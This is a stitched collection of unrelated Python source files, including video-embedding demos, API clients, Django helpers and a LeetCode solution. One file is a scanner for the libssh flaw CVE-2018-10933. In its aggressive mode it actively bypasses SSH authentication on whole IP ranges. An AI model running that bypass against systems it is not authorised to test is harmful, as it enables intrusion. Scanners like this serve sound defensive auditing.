    text_input = tf.constant(input_words)
    text_embedding = model.signatures['text'](text_input)['text_embedding']

    return video_embedding, text_embedding
def crop_center(frame):
    """Return the largest centered square crop of a frame shaped (H, W[, C])."""
    height, width = frame.shape[:2]
    side = min(width, height)
    # Center the square using the same floor arithmetic on both axes.
    top = (height // 2) - (side // 2)
    left = (width // 2) - (side // 2)
    return frame[top:top + side, left:left + side]
def fetch_and_read_video(video_url,
                         max_frames=32,
                         resize=(224, 224)):
    """Download a video, decode up to ``max_frames`` frames, and normalize them.

    Each frame is center-cropped to a square, resized, and converted to RGB.
    Short videos are padded by repeating frames so the result always has
    exactly ``max_frames`` frames.

    :param video_url: URL of the video/GIF to download.
    :param max_frames: number of frames in the returned clip.
    :param resize: (width, height) passed to ``cv2.resize``.
    :return: float array of shape (max_frames, H, W, 3), scaled to [0, 1].
    :raises ValueError: if no frames could be decoded from the download.
    """
    # BUG FIX: URLs are always '/'-separated; the original split on
    # os.path.sep, which is '\\' on Windows and broke the filename there.
    extension = video_url.rsplit('/', maxsplit=1)[-1]
    path = get_file(f'{str(uuid.uuid4())}.{extension}',
                    video_url,
                    cache_dir='.',
                    cache_subdir='.')

    capture = cv2.VideoCapture(path)
    frames = []

    # BUG FIX: the original loop condition was `<=`, which collected (and
    # returned) max_frames + 1 frames for sufficiently long videos.
    while len(frames) < max_frames:
        frame_read, frame = capture.read()
        if not frame_read:
            break
        frame = crop_center(frame)
        frame = cv2.resize(frame, resize)
        frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
        frames.append(frame)

    capture.release()

    if not frames:
        # Avoid a ZeroDivisionError in the padding step below.
        raise ValueError(f'no frames could be read from {video_url}')

    frames = np.array(frames)

    if len(frames) < max_frames:
        # Pad short clips by repeating frames, then trim to the exact length.
        repetitions = math.ceil(
            float(max_frames) / len(frames))
        repetitions = int(repetitions)
        frames = frames.repeat(repetitions, axis=0)
        frames = frames[:max_frames]

    return frames / 255.0
# GIFs used as the video corpus; QUERIES below pairs one description per clip.
URLS = [
    ('https://media.giphy.com/media/'
     'WWYSFIZo4fsLC/source.gif'),
    ('https://media.giphy.com/media/'
     'fwhIy2QQtu5vObfjrs/source.gif'),
    ('https://media.giphy.com/media/'
     'W307DdkjIsRHVWvoFE/source.gif'),
    ('https://media.giphy.com/media/'
     'FOcbaDiNEaqqY/source.gif'),
    ('https://media.giphy.com/media/'
     'VJwck53yG6y8s2H3Og/source.gif')]

# Download and decode every clip into a (max_frames, H, W, 3) array.
VIDEOS = [fetch_and_read_video(url) for url in URLS]

QUERIES = ['beach', 'playing drums', 'airplane taking off',
           'biking', 'dog catching frisbee']

# MIL-NCE S3D model with separate video and text signatures.
model = tfhub.load('https://tfhub.dev/deepmind/mil-nce/s3d/1')

video_emb, text_emb = produce_embeddings(model,
                                         np.stack(VIDEOS,
                                                  axis=0),
                                         np.array(QUERIES))

# Similarity matrix: rows are queries, columns are videos.
scores = np.dot(text_emb, tf.transpose(video_emb))

# One representative (first) frame per clip, converted back to BGR for OpenCV.
first_frames = [v[0] for v in VIDEOS]
first_frames = [cv2.cvtColor((f * 255.0).astype('uint8'),
                             cv2.COLOR_RGB2BGR) for f in
                first_frames]

# NOTE(review): `video` is never used in this loop, and `sorted_results`
# pairs QUERIES (not video labels) with the per-video scores in
# `query_scores` — verify the intended pairing against the score matrix.
for query, video, query_scores in zip(QUERIES, VIDEOS, scores):
    sorted_results = sorted(list(zip(QUERIES,
                                     first_frames,
                                     query_scores)),
                            key=lambda p: p[-1],
                            reverse=True)

    # Annotate each frame with its rank and score, best match first.
    annotated_frames = []
    for i, (q, f, s) in enumerate(sorted_results, start=1):
        frame = f.copy()
        cv2.putText(frame,
                    f'#{i} - Score: {s:.2f}',
                    (8, 15),
                    fontFace=cv2.FONT_HERSHEY_SIMPLEX,
                    fontScale=0.6,
                    color=(0, 0, 255),
                    thickness=2)
        annotated_frames.append(frame)

    # Show all ranked frames side by side; wait for a key press per query.
    cv2.imshow(f'Results for query "{query}"',
               np.hstack(annotated_frames))
    cv2.waitKey(0)
|
from __future__ import absolute_import, division, print_function, unicode_literals
from six import python_2_unicode_compatible
from canvasapi.bookmark import Bookmark
from canvasapi.paginated_list import PaginatedList
from canvasapi.user import User
from canvasapi.util import combine_kwargs, obj_or_id
@python_2_unicode_compatible
class CurrentUser(User):
    """The currently authenticated user (``/users/self``).

    Instantiating this class immediately issues ``GET users/self`` and
    populates the object from the JSON response.
    """

    def __init__(self, _requester):
        self._requester = _requester

        response = self._requester.request(
            'GET',
            'users/self'
        )

        super(CurrentUser, self).__init__(self._requester, response.json())

    def __str__(self):
        return "{} ({})".format(self.name, self.id)

    def list_groups(self, **kwargs):
        """
        Return the list of active groups for the user.

        :calls: `GET /api/v1/users/self/groups \
        <https://canvas.instructure.com/doc/api/groups.html#method.groups.index>`_

        :rtype: :class:`canvasapi.paginated_list.PaginatedList` of :class:`canvasapi.group.Group`
        """
        from canvasapi.group import Group

        return PaginatedList(
            Group,
            self._requester,
            'GET',
            'users/self/groups',
            _kwargs=combine_kwargs(**kwargs)
        )

    def list_bookmarks(self, **kwargs):
        """
        List bookmarks that the current user can view or manage.

        :calls: `GET /api/v1/users/self/bookmarks \
        <https://canvas.instructure.com/doc/api/bookmarks.html#method.bookmarks/bookmarks.index>`_

        :rtype: :class:`canvasapi.paginated_list.PaginatedList` of
            :class:`canvasapi.bookmark.Bookmark`
        """
        # BUG FIX: kwargs were accepted but silently dropped; forward them
        # to the request like list_groups() does.
        return PaginatedList(
            Bookmark,
            self._requester,
            'GET',
            'users/self/bookmarks',
            _kwargs=combine_kwargs(**kwargs)
        )

    def create_bookmark(self, name, url, **kwargs):
        """
        Create a new Bookmark.

        :calls: `POST /api/v1/users/self/bookmarks \
        <https://canvas.instructure.com/doc/api/bookmarks.html#method.bookmarks/bookmarks.create>`_

        :param name: The name of the bookmark.
        :type name: `str`
        :param url: The url of the bookmark.
        :type url: `str`
        :rtype: :class:`canvasapi.bookmark.Bookmark`
        """
        from canvasapi.bookmark import Bookmark

        response = self._requester.request(
            'POST',
            'users/self/bookmarks',
            name=name,
            url=url,
            _kwargs=combine_kwargs(**kwargs)
        )

        return Bookmark(self._requester, response.json())

    def get_bookmark(self, bookmark):
        """
        Return single Bookmark by id

        :calls: `GET /api/v1/users/self/bookmarks/:id \
        <https://canvas.instructure.com/doc/api/bookmarks.html#method.bookmarks/bookmarks.show>`_

        :param bookmark: The object or ID of the bookmark.
        :type bookmark: :class:`canvasapi.bookmark.Bookmark` or int
        :rtype: :class:`canvasapi.bookmark.Bookmark`
        """
        from canvasapi.bookmark import Bookmark

        bookmark_id = obj_or_id(bookmark, "bookmark", (Bookmark,))

        response = self._requester.request(
            'GET',
            'users/self/bookmarks/{}'.format(bookmark_id)
        )

        return Bookmark(self._requester, response.json())
|
"""
This example creates a center column study reactor using a parametric reactor.
Adds some TF coils to the reactor. By default the script saves stp, stl,
html and svg files.
"""
import paramak
def make_center_column_study_reactor(
        outputs=(
            'stp',
            'neutronics',
            'svg',
            'stl',
            'html')):
    """Build a CenterColumnStudyReactor with TF coils and export it.

    :param outputs: formats to export; any subset of
        'stp', 'neutronics', 'svg', 'stl', 'html'.
        NOTE: the default is a tuple rather than the original list to
        avoid the mutable-default-argument pitfall; membership tests
        (`'stp' in outputs`) behave identically.
    """
    my_reactor = paramak.CenterColumnStudyReactor(
        inner_bore_radial_thickness=20,
        inboard_tf_leg_radial_thickness=50,
        center_column_shield_radial_thickness_mid=50,
        center_column_shield_radial_thickness_upper=100,
        inboard_firstwall_radial_thickness=20,
        divertor_radial_thickness=100,
        inner_plasma_gap_radial_thickness=80,
        plasma_radial_thickness=200,
        outer_plasma_gap_radial_thickness=90,
        elongation=2.3,
        triangularity=0.45,
        plasma_gap_vertical_thickness=40,
        center_column_arc_vertical_thickness=520,
        rotation_angle=180)

    # adding in some TF coils; R2 is the sum of the radial build above
    tf_magnet = paramak.ToroidalFieldCoilPrincetonD(
        R1=20 + 50,
        R2=20 + 50 + 50 + 80 + 200 + 90 + 100 + 20,
        thickness=50,
        distance=50,
        number_of_coils=12,
        rotation_angle=180
    )

    my_reactor.shapes_and_components.append(tf_magnet)

    if 'stp' in outputs:
        my_reactor.export_stp(output_folder='CenterColumnStudyReactor')
    if 'neutronics' in outputs:
        my_reactor.export_neutronics_description(
            'CenterColumnStudyReactor/manifest.json')
    if 'svg' in outputs:
        my_reactor.export_svg('CenterColumnStudyReactor/reactor.svg')
    if 'stl' in outputs:
        my_reactor.export_stl(output_folder='CenterColumnStudyReactor')
    if 'html' in outputs:
        my_reactor.export_html('CenterColumnStudyReactor/reactor.html')
if __name__ == "__main__":
make_center_column_study_reactor()
|
# -*- coding: utf-8 -*-
"""
Created on Tue Sep 18 14:21:09 2018
@author: Basil
"""
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 14 19:33:08 2018
@author: Basil
"""
#from numpy import *
import gc
import numpy
import time
from joblib import Parallel, delayed
def GetIntensityDependence(zs, useRunningTime=False):
    """Simulate a per-z intensity computation for the parallel demo.

    Allocates a (len(zs), Nall) array of NaNs (Nall is a module-level
    constant), sleeps to stand in for real work, and returns the array.

    :param zs: sequence of z positions; one output row per entry.
    :param useRunningTime: unused; kept for interface compatibility.
    """
    # numpy.NaN was removed in NumPy 2.0; numpy.nan is the portable spelling.
    intensities_z = numpy.full((len(zs), Nall), numpy.nan)
    time.sleep(10)  # placeholder for the real computation
    return intensities_z
Izt0yx = None;
gc.collect()

# Split the z range into one chunk per worker and compute chunks in parallel.
n_jobs = 2
Nall = 8000000  # columns per result row (large on purpose for the demo)
Nz = 60;
zs_intervals = numpy.split(numpy.linspace(1, Nz, Nz), n_jobs)
# Each worker returns a (chunk, Nall) array; stack them into one array.
Izt0yx = numpy.array(Parallel(n_jobs=n_jobs)(delayed(GetIntensityDependence)(zs, True) for zs in zs_intervals))#GetIntensityDependence(x, ts+t0, zs, True)
gc.collect()
|
# Sprobuj wykonac w shellu:
# locals()
# globals()
# import a01_funkcje
# locals()
# globals()
"""
Opis modulu
"""
# Module-level bindings that the demo functions below read and rebind.
a = 1
b = 2
def test1(arg1):
    """This is the first line of the description.

    And these are the subsequent lines.
    And more.
    And more still.
    """
    a = arg1  # binds a *local* `a`; the module-level `a` is untouched
    print('test1: LOCALS :', locals())
    print('test1: GLOBALS :', globals()['a'])
def test2(arg2):
    """Test2 docstring.
    """
    global a  # now assignments to `a` rebind the module-level name
    a = arg2
    b = arg2 + 1  # local `b`; module-level `b` is unchanged
    test1(b)
    print('test2:LOCALS :', locals())
    print('test2:GLOBALS :', globals()['a'])
# Demo sequence: show how the module-level names change across the calls.
print(a, b)
test1(3)
print('--------------')
test2(3)
print(a, b)
print(test1.__doc__)
print(test2.__doc__)
print(locals.__doc__)
print(globals.__doc__)
# At module level locals() returns the same dict as globals(),
# so this assignment actually rebinds the module-level `a`.
locals()['a'] = 5
print(locals()['a'], a)
print(globals()['a'])
globals()['a'] = 6
print(globals()['a'])
# print(globals()['z'])
# globals()['z'] = 6
# print(globals()['z'], z)
# nastepnie sprawdzmy wyniki
# import a01localsglobals
#
# a01localsglobals.a
# a01localsglobals.b
# a01localsglobals.test1(3)
# a01localsglobals.test2(3)
# jakie wyniki otrzymamy wywolujac
# a01localsglobals.test1.__doc__
# a01localsglobals.test2.__doc__
#
# Sprawdz
locals.__doc__
globals.__doc__
|
import numpy as np
class BayesNet(object):
    """A Bayesian network: a container for a collection of nodes."""

    def __init__(self):
        # No nodes until the network is populated by the caller.
        self.nodes = None
class Node(object):
    """A single network node holding its probability table and state."""

    def __init__(self, table, state):
        # Stored as given; no validation or copying is performed.
        self.table = table
        self.state = state
if __name__ == "__main__":
pass
|
import os
import sys
import numpy as np
import rootpath
import xml.etree.ElementTree as ET
from collections import namedtuple
try:
    # Make the project root importable before pulling in project modules.
    sys.path.append(os.path.join(rootpath.detect()))
    import setup
    from argU.preprocessing.texts import clean_to_nl
    from argU.preprocessing.texts import clean_to_train
    from argU.preprocessing.texts import clean_pos_tags
except Exception as e:
    print(e)
    # BUG FIX: exit with a non-zero status so callers see the failure
    # (the original exited with 0, which signals success).
    sys.exit(1)
# Lightweight record for a topic query: its XML id and its cleaned text.
Query = namedtuple('Query', 'id text')
def read(directory):
    """Read the topic queries from ``topics.xml`` in *directory* and clean them.

    Each topic's first child is taken as the id and its second child as the
    raw query text, which is passed through ``__clean``.
    """
    topics = ET.parse(os.path.join(directory, 'topics.xml')).getroot()
    return [
        Query(topic[0].text, __clean(topic[1].text))
        for topic in topics
    ]
def __clean(q_text):
    """Normalize a raw query: drop '?', then apply the training-text cleanup
    pipeline in order (natural-language clean, train clean, POS-tag clean)."""
    cleaned = q_text.replace('?', '')
    for step in (clean_to_nl, clean_to_train, clean_pos_tags):
        cleaned = step(cleaned)
    return cleaned
if __name__ == '__main__':
    # Demo: embed the topic queries with the dual-embedding (DESM) model.
    from argU.indexing.models import CBOW
    from argU.indexing.models import DESM

    cbow = CBOW.load()
    desm = DESM(cbow)
    queries = read(setup.ROOT_PATH)
    print(desm.queries_to_emb(queries))
|
import sgtk
from sgtk.platform.qt import QtCore, QtGui
import cPickle
from ..ui.my_time_form import Ui_MyTimeForm
logger = sgtk.platform.get_logger(__name__)
class MyTimeTree(QtGui.QListView):
    '''
    a listView whose items can be moved (dragged out as time-log events)
    '''

    def __init__(self, parent=None):
        QtGui.QListView.__init__(self, parent)
        self.setSpacing(1)
        self.setStyleSheet("font-size: 12pt;")
        self.setDragEnabled(True)

    def dragEnterEvent(self, event):
        """Accept only drags carrying our custom time-log MIME type."""
        if event.mimeData().hasFormat("application/x-timelogevent"):
            # BUG FIX: the original used QtCore.Qt.QMoveAction, which does
            # not exist in the Qt.DropAction enum; the correct constant is
            # QtCore.Qt.MoveAction.
            event.setDropAction(QtCore.Qt.MoveAction)
            event.accept()
        else:
            event.ignore()

    def startDrag(self, event):
        """Serialize the item under the cursor and start a move drag."""
        index = self.indexAt(event.pos())
        if not index.isValid():
            return

        # selected is the relevant person object
        selected = self.model().data(index, QtCore.Qt.UserRole)
        logger.debug("Drag data: %s" % selected)

        # convert to a bytestream for the MIME payload
        bstream = cPickle.dumps(selected)
        mimeData = QtCore.QMimeData()
        mimeData.setData("application/x-timelogevent", bstream)
        drag = QtGui.QDrag(self)
        drag.setMimeData(mimeData)

        # render the dragged row itself as the drag pixmap
        # (the original called setPixmap twice; once is enough)
        pixmap = QtGui.QPixmap()
        pixmap = pixmap.grabWidget(self, self.rectForIndex(index))
        drag.setPixmap(pixmap)
        drag.setHotSpot(QtCore.QPoint(pixmap.width() / 2, pixmap.height() / 2))

        # pixmap = QtGui.QPixmap(100, self.height()/2)
        # pixmap.fill(QtGui.QColor("orange"))
        # drag.setPixmap(pixmap)

        result = drag.start(QtCore.Qt.MoveAction)
        if result:  # == QtCore.Qt.MoveAction:
            # the drop was accepted elsewhere; remove the row from this view
            self.model().removeRow(index.row())

    def mouseMoveEvent(self, event):
        # any mouse movement with the button held starts a drag
        self.startDrag(event)
class MyTimeForm(QtGui.QWidget):
    '''
    a listView of my time which can be moved
    '''

    def __init__(self, time_model, user, parent=None):
        """
        Construction

        :param time_model: The Shotgun Model this widget should connect to
        :param user: the current user entity this form shows time for
        :param parent: The parent QWidget for this control
        """
        QtGui.QWidget.__init__(self, parent)

        # set up the UI from the generated Designer form
        self._ui = Ui_MyTimeForm()
        self._ui.setupUi(self)
        self._app = sgtk.platform.current_bundle()
        self.user = user

        # embed the draggable list view and wire the "add new" button
        self.time_tree = MyTimeTree(self)
        self.time_tree.setModel(time_model)
        self._ui.verticalLayout.addWidget(self.time_tree)
        self._ui.addnew_btn.clicked.connect(self._on_addnew)

    def update_ui(self):
        """
        Update the UI to reflect logged in time, etc.
        """
        pass  # not yet implemented

    def _on_addnew(self):
        # slot for the "add new" button; not yet implemented
        pass
|
"""Leetcode 4. Median of Two Sorted Arrays
Hard
There are two sorted arrays nums1 and nums2 of size m and n respectively.
Find the median of the two sorted arrays.
The overall run time complexity should be O(log (m+n)).
You may assume nums1 and nums2 cannot be both empty.
Example 1:
nums1 = [1, 3]
nums2 = [2]
The median is 2.0
Example 2:
nums1 = [1, 2]
nums2 = [3, 4]
The median is (2 + 3)/2 = 2.5
"""
class SolutionSelect(object):
    """Median of two sorted arrays via divide-and-conquer k-th selection."""

    def _findKth(self, a, b, k):
        """Return the k-th (0-indexed) smallest element of sorted lists a and b."""
        # Base cases: one list exhausted -> index directly into the other.
        if not a:
            return b[k]
        if not b:
            return a[k]

        mid_a, mid_b = len(a) // 2, len(b) // 2
        if k <= mid_a + mid_b:
            # k lies at or before the combined middles: the upper half of
            # the list with the larger middle cannot contain the answer.
            if a[mid_a] > b[mid_b]:
                return self._findKth(a[:mid_a], b, k)
            return self._findKth(a, b[:mid_b], k)
        # k lies past the combined middles: the lower half of the list with
        # the smaller middle cannot contain the answer; adjust k accordingly.
        if a[mid_a] > b[mid_b]:
            return self._findKth(a, b[(mid_b + 1):], k - mid_b - 1)
        return self._findKth(a[(mid_a + 1):], b, k - mid_a - 1)

    def findMedianSortedArrays(self, nums1, nums2):
        """
        :type nums1: List[int]
        :type nums2: List[int]
        :rtype: float

        Time complexity: O(log(m + n)).
        Space complexity: O(m + n).
        """
        # Selection method; indices are 0-based.
        total = len(nums1) + len(nums2)
        if total % 2 == 1:
            return self._findKth(nums1, nums2, total // 2)
        lower = self._findKth(nums1, nums2, total // 2 - 1)
        upper = self._findKth(nums1, nums2, total // 2)
        return (lower + upper) / 2.0
def main():
    """Exercise the selection-based median on the two LeetCode examples."""
    solver = SolutionSelect()

    # Expected: 2.0
    print(solver.findMedianSortedArrays([1, 3], [2]))

    # Expected: 2.5
    print(solver.findMedianSortedArrays([1, 2], [3, 4]))
# Run the examples when executed as a script.
if __name__ == '__main__':
    main()
|
# Copyright (C) 2020 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Object mapper modal."""
from lib import base
from lib.page.modal import search_modal_elements
class ObjectMapper(base.WithBrowser):
    """Object mapper modal."""
    # pylint: disable=too-few-public-methods

    def __init__(self):
        super(ObjectMapper, self).__init__()
        # Root element of the modal; all child lookups are scoped to it.
        self._root = self._browser.element(tag_name="object-mapper")

    @property
    def search_filter_area(self):
        """Search/filter controls of the modal."""
        return search_modal_elements.SearchFilterArea(self._root)

    @property
    def search_results_area(self):
        """List of search results shown in the modal."""
        return search_modal_elements.SearchResultsArea(self._root)

    @property
    def map_selected_btn(self):
        """The `Map Selected` button element."""
        return self._root.button(text="Map Selected")

    def click_map_selected(self):
        """Clicks `Map Selected` button and waits for the modal to close."""
        self.map_selected_btn.click()
        self._root.wait_until(lambda modal: not modal.exists)

    def map_obj(self, obj):
        """Maps object: search for it, select the matching result, confirm."""
        self.search_filter_area.search_obj(obj)
        match = self.search_results_area.get_result_by(title=obj.title)
        match.select()
        self.click_map_selected()
|
from django.core.mail import send_mail, EmailMessage, send_mass_mail, EmailMultiAlternatives
from django.template.loader import render_to_string
from django.utils.html import strip_tags
# Sender address used by every outgoing message in this module.
FROM_EMAIL = 'no-reply@massenergize.org'
def send_massenergize_email(subject, msg, to):
    """Send a plain-text email to a single recipient.

    Returns True on success, False (after logging) otherwise.
    Exceptions from the mail backend propagate (fail_silently=False).
    """
    sent = send_mail(
        subject,
        msg,
        FROM_EMAIL,  # from address
        [to],
        fail_silently=False,
    )
    if sent:
        return True
    print(f"Error Occurred in Sending Email to {to}")
    return False
def send_massenergize_rich_email(subject, to, massenergize_email_type, content_variables):
    """Render an HTML template and send it with a plain-text alternative.

    Returns True on success, False (after logging) otherwise; backend
    errors are suppressed (fail_silently=True).
    """
    html_content = render_to_string(massenergize_email_type, content_variables)
    message = EmailMultiAlternatives(
        subject, strip_tags(html_content), FROM_EMAIL, [to])
    message.attach_alternative(html_content, "text/html")
    if message.send(fail_silently=True):
        return True
    print(f"Error Occurred in Sending Email to {to}")
    return False
def send_massenergize_mass_email(subject, msg, recipient_emails):
    """Send one plain-text message to many recipients in a single call.

    Returns True if any messages were sent, False (after logging) otherwise.
    """
    sent_count = send_mail(
        subject,
        msg,
        FROM_EMAIL,  # from address
        recipient_list=recipient_emails,
        fail_silently=True,
    )
    if not sent_count:
        print(f"Error occurred in sending some emails")
        return False
    print(f"{sent_count} sent emails")
    return True
"""
Test autoencoder sparse activation cost.
"""
from pylearn2.config import yaml_parse
def test_sparse_activation():
    """Test autoencoder sparse activation cost."""
    # `test_yaml` is defined at the bottom of this module; the module-level
    # name is resolved at call time, so the forward reference is fine.
    trainer = yaml_parse.load(test_yaml)
    trainer.main_loop()
test_yaml = """
!obj:pylearn2.train.Train {
dataset: &train
!obj:pylearn2.testing.datasets.random_one_hot_dense_design_matrix
{
rng: !obj:numpy.random.RandomState { seed: 1 },
num_examples: 10,
dim: 5,
num_classes: 2,
},
model: !obj:pylearn2.models.autoencoder.Autoencoder {
nvis: 5,
nhid: 10,
act_enc: sigmoid,
act_dec: linear,
},
algorithm: !obj:pylearn2.training_algorithms.bgd.BGD {
batch_size: 5,
line_search_mode: exhaustive,
conjugate: 1,
cost: !obj:pylearn2.costs.cost.SumOfCosts {
costs: [
!obj:pylearn2.costs.autoencoder.MeanSquaredReconstructionError {
},
!obj:pylearn2.costs.autoencoder.SparseActivation {
coeff: 0.5,
p: 0.2,
},
],
},
monitoring_dataset: {
'train': *train,
},
termination_criterion: !obj:pylearn2.termination_criteria.EpochCounter
{
max_epochs: 1,
},
},
}
"""
|
#!/usr/bin/env python2
# CVE-2018-10933 Scanner by Leap Security (@LeapSecurity) https://leapsecurity.io
import socket, argparse, sys, os, paramiko, ipaddress
from six import text_type
VERSION = "1.0.4"
class colors(object):
    """ANSI terminal escape codes used by the status printers below."""
    blue = "\033[1;34m"
    normal = "\033[0;00m"  # reset to the terminal default
    red = "\033[1;31m"
    yellow = "\033[1;33m"
def pstatus(ip, port, banner):
    # Informational: host responded but its banner is not a vulnerable libssh.
    print("{blue}[*]{white} {ipaddr}:{port} is not vulnerable to authentication bypass ({banner})".format(blue=colors.blue, white=colors.normal, ipaddr=ip, port=port, banner=banner.strip()))
def ptimeout(ip, port):
    # Host did not answer within the socket timeout.
    print("{red}[-]{white} {ipaddr}:{port} has timed out.".format(red=colors.red, white=colors.normal, ipaddr=ip, port=port))
def ppatch(ip, port, banner):
    # Host runs a libssh version with the CVE-2018-10933 fix.
    print("{blue}[*]{white} {ipaddr}:{port} has been patched ({banner})".format(blue=colors.blue, white=colors.normal, ipaddr=ip, port=port, banner=banner.strip()))
def pvulnerable(ip, port, banner):
    # Banner (or active probe) indicates the auth-bypass vulnerability.
    print("{yellow}[!]{white} {ipaddr}:{port} is likely VULNERABLE to authentication bypass ({banner})".format(yellow=colors.yellow, white=colors.normal, ipaddr=ip, port=port, banner=banner.strip()))
def pexception(ip, port, banner):
    # Unexpected error while probing the host.
    print("{red}[-]{white} {ipaddr}:{port} has encountered an exception ({banner}).".format(red=colors.red, white=colors.normal, ipaddr=ip, port=port, banner=banner.strip()))
def passive(ip, port): #banner grab to verify vulnerable host
    """Grab the first line of the SSH banner from ip:port; '' on failure."""
    try:
        s = socket.create_connection((ip, port), timeout=0.50000)
        # Connection succeeded; clear the timeout for the banner read.
        # NOTE(review): recv with no timeout can block indefinitely on a
        # host that accepts but never sends — confirm this is acceptable.
        s.settimeout(None)
        banner = s.recv(1024)
        s.close()
        return banner.split("\n")[0]
    except (socket.timeout, socket.error) as e:
        ptimeout(ip, port)
        return ""
def aggressive(ip, port, banner): #bypass auth to verify vulnerable host
    """Actively probe CVE-2018-10933: send USERAUTH_SUCCESS to the server
    and try to open a session without ever authenticating."""
    try:
        s = socket.create_connection((ip, port), timeout=0.50000)
        s.settimeout(None)
        msg = paramiko.message.Message()
        t = paramiko.transport.Transport(s)
        t.start_client()
        # The bypass: claim authentication already succeeded.
        msg.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        t._send_message(msg)
        # If the server lets us open a session, it accepted the forged state.
        c = t.open_session(timeout=0.50000)
        s.close()
        pvulnerable(ip, port, banner)
    except (socket.timeout, socket.error) as e:
        ptimeout(ip, port)
    except paramiko.SSHException as e:
        # Patched/compliant servers reject the bogus message.
        pstatus(ip, port, banner)
        #print e
    except Exception as e:
        pexception(ip, port, banner)
# ---- CLI setup -------------------------------------------------------------
parser = argparse.ArgumentParser(description='libssh Scanner - Find vulnerable libssh services by Leap Security (@LeapSecurity)')
parser.add_argument('target', help="An ip address (network) or new line delimited file containing IPs to banner grab for the vulnerability.")
parser.add_argument("-V", "--version", action="version", help="Show version and exit", default=VERSION)
parser.add_argument('-p', '--port', default=22, help="Set port of SSH service")
parser.add_argument("-a", "--aggressive", action="store_true", help="Identify vulnerable hosts by bypassing authentication")
# No arguments at all: show usage instead of an argparse error.
if len(sys.argv) == 1:
    parser.print_help()
    sys.exit(1)
args = parser.parse_args()
# NOTE(review): `results` is never used anywhere below.
ips, results = [], []
print("\nlibssh scanner {}\n".format(VERSION))
# ---- Build the target list: file of IPs, or a single IP/CIDR network ------
if os.path.isfile(args.target): #if file add hosts
    with open (args.target) as f:
        for line in f.readlines():
            ips.append(line.strip())
else: #if not scan the provided IP
    network = ipaddress.ip_network(text_type(args.target.strip()))
    for ip in network:
        ips.append(str(ip))
print("Searching for Vulnerable Hosts...\n")
if args.aggressive:
    paramiko.util.log_to_file("paramiko.log")
    # Active probe: banner grab first, then attempt the auth bypass.
    for ip in ips:
        aggressive(ip, int(args.port), passive(ip, int(args.port)))
else: #banner grab
    # Passive mode: classify purely on the version in the banner.
    # NOTE(review): the b"" prefixes are no-ops under the python2 shebang
    # (bytes is str); under python3 `banner` would be str after split() and
    # these membership tests would always be False — confirm target runtime.
    for ip in ips:
        banner = passive(ip, int(args.port)) #banner
        if banner:
            if any(version in banner for version in [b"libssh-0.6", b"libssh_0.6"]): #vulnerable
                pvulnerable(ip, args.port, banner)
            elif any(version in banner for version in [b"libssh-0.7", b"libssh_0.7"]):
                # Patch level is taken from the text after the final '.'.
                if int(banner.split(".")[-1]) >= 6: #libssh is 0.7.6 or greater (patched)
                    ppatch(ip, args.port, banner)
                else: #vulnerable
                    pvulnerable(ip, args.port, banner)
            elif any(version in banner for version in [b"libssh-0.8", b"libssh_0.8"]):
                if int(banner.split(".")[-1]) >= 4: #libssh is 0.8.4 or greater (patched)
                    ppatch(ip, args.port, banner)
                else: #vulnerable
                    pvulnerable(ip, args.port, banner)
            else: #not vulnerable
                pstatus(ip, args.port, banner)
print("\nScanner Completed Successfully\n")
|
# Generated by Django 3.0.3 on 2020-02-18 15:01
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: redefine ``TimeEntry.start`` as a plain
    DateTimeField (previous field definition is in migration 0006)."""

    dependencies = [
        ('console', '0006_auto_20200218_1601'),
    ]

    operations = [
        migrations.AlterField(
            model_name='timeentry',
            name='start',
            field=models.DateTimeField(),
        ),
    ]
|
import cv2
import threading
#from tf_pose_estimation.run_v3 import PoseEstimator
class VideoCamera(object):
    """Threaded OpenCV webcam reader: a daemon thread keeps ``self.frame``
    updated with the most recent capture so ``read()`` never blocks on I/O."""

    def __init__(self):
        self.video = cv2.VideoCapture(0)  # default system camera
        # Prime grabbed/frame so read() has data before the thread starts.
        (self.grabbed, self.frame) = self.video.read()
        self.stopped = False
        #self.estimator = PoseEstimator()

    #def _configure(self):
    #    self.estimator.configure()

    def __del__(self):
        # NOTE(review): releasing in __del__ relies on GC timing; an
        # explicit close path (e.g. in stop()) would be more reliable.
        self.video.release()

    def start(self):
        """Start the background capture thread and return self (fluent)."""
        video_thread = threading.Thread(target=self.update)
        video_thread.daemon = True  # do not block interpreter exit
        video_thread.start()
        return self

    def update(self):
        """Capture loop body executed on the background thread."""
        print("read")
        # keep looping infinitely until the thread is stopped
        while True:
            # if the thread indicator variable is set, stop the thread
            if self.stopped:
                return
            # otherwise, read the next frame from the stream
            (self.grabbed, self.frame) = self.video.read()

    def read(self):
        """Return the latest frame resized to 576x432 and mirrored.

        NOTE(review): raises if the camera failed and self.frame is None —
        confirm capture succeeded (self.grabbed) before relying on this.
        """
        img = cv2.resize(self.frame, (576, 432))
        img = cv2.flip( img, 1)
        #img = estimator.aruco_tracking(img, estimator.mtx, estimator.dist, None)
        return img

    def stop(self):
        # indicate that the thread should be stopped
        self.stopped = True
'''
def get_frame(self, estimator):
success, image = self.video.read()
img = cv2.resize(image, (432, 384))
img = cv2.flip( img, 1)
img = estimator.predict(img)
ret, jpeg = cv2.imencode('.jpg', img)
return jpeg.tobytes()
''' |
"""
Database
Initialize and create connection control flow for database.
Database parameters must be set in config.py or directly in app.py
"""
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker, scoped_session
from contextlib import contextmanager
from models import *
import click
from flask import current_app, g
from flask.cli import with_appcontext
import logging
def get_db():
    """
    Return the current database connection for this app context.

    If no connection is present, connects to the configured database
    (``DATABASE_URI``). Default is non-authenticated SQL. Modify
    ``g.db = *connect`` to match the intended database connection.

    Raises:
        ConnectionError: if the connection cannot be established.
    """
    db_logger = logging.getLogger(__name__ + '.getdb')
    if 'db' not in g:
        db_logger.info('DB connection not found. Attempting connection to {}.'.format(current_app.config['DATABASE_URI']))
        try:
            g.engine = create_engine(current_app.config['DATABASE_URI'])
            g.db = g.engine.connect()
        # Fixed: was a bare `except:` which also swallowed SystemExit /
        # KeyboardInterrupt and discarded the original failure.
        except Exception as exc:
            db_logger.error('Could not establish connection. Aborting.')
            # Chain the cause so the underlying SQLAlchemy error is visible.
            raise ConnectionError(
                'Could not connect to {}'.format(current_app.config['DATABASE_URI'])
            ) from exc
    return g.db
@contextmanager
